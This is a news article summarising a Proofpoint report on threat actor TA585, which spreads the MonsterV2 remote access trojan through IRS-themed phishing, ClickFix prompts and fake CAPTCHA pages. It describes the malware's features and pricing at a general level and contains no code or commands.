- A previously unknown threat actor named TA585 distributes the Malware MonsterV2 through phishing campaigns.
- MonsterV2 is a remote access trojan (RAT) and data stealer first seen advertised in February 2025.
- Phishing efforts use fake IRS notices and manipulated websites to trick users into running malicious PowerShell commands.
- The malware offers advanced features such as clipboard manipulation, hidden remote control, and download of additional payloads.
- TA585 maintains its own infrastructure for delivery and avoids infecting systems in Commonwealth of Independent States (CIS) countries.
Cybersecurity researchers have identified a threat actor known as TA585 that uses phishing campaigns to deliver the malware MonsterV2. This activity was reported in October 2025 and involves phishing lures themed around the U.S. Internal Revenue Service (IRS) to convince victims to run harmful commands on their devices.
According to the Proofpoint Threat Research Team, TA585 operates its own entire attack chain including infrastructure and malware installation. MonsterV2 first appeared in cybercriminal forums in February 2025. It functions as a remote access trojan (RAT), a stealer (which extracts sensitive data), and a loader for other malicious software.
Phishing campaigns use fake IRS notices linking to PDF files that lead to web pages triggering the infection through a social engineering trick called ClickFix. This method involves users executing malicious commands in Windows Run or PowerShell, which then download and deploy MonsterV2. Later attacks used manipulated JavaScript injected into legitimate websites to display fake CAPTCHA verifications that initiate the malware’s delivery.
Before switching to MonsterV2, TA585 distributed the Lumma Stealer. The infrastructure involved has also been linked to distributing other stealers like Rhadamanthys. Some campaigns used fake GitHub security alerts to deliver links to attacker-controlled sites. These activities relate to a framework called CoreSecThree, active since 2022 and known to spread stealer malware.
MonsterV2 includes features such as copying cryptocurrency addresses from the clipboard and replacing them with attacker wallets, running hidden virtual network computing (HVNC) sessions for remote control, capturing screenshots, starting keyloggers, managing files, and executing commands sent from command-and-control (C2) servers. It also avoids infections within CIS countries.
The malware is sold by a Russian-speaking threat actor costing $800 monthly for a standard version and $2,000 for an enterprise edition that supports advanced features like loader functions and Chrome DevTools Protocol. MonsterV2 is packed with a C++ crypter called SonicCrypt that helps it avoid detection by performing anti-analysis and privilege escalation before connecting to its C2 server.
Once active, MonsterV2 sends system details including geolocation via a public IP lookup service. It follows instructions from its server to perform tasks including data theft, process control, HVNC connections, keylogging, system crashes, and deployment of additional payloads like StealC and Remcos RAT. The use of consistent infrastructure between MonsterV2 and StealC suggests coordination.
Proofpoint concluded that TA585 demonstrates advanced and unique capabilities, managing complex delivery and infection methods without relying on third parties, marking it as a significant presence in the evolving cybercrime landscape.
For more information, see the original Proofpoint report and related analysis by PRODAFT.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
Previous Articles:
- Broadcom Stock Surges 10% on $10B OpenAI AI Chip Partnership News
- Bitcoin, Ethereum, XRP Drop Sharply as U.S.-China Trade Tensions Rise
- Bitcoin ETFs See Biggest Outflow Since September; IBIT Resilient
- Malicious Packages Use Discord Webhooks for Data Theft, Alert Experts
- JP Morgan Unveils $10B Push Into US National Security Sectors
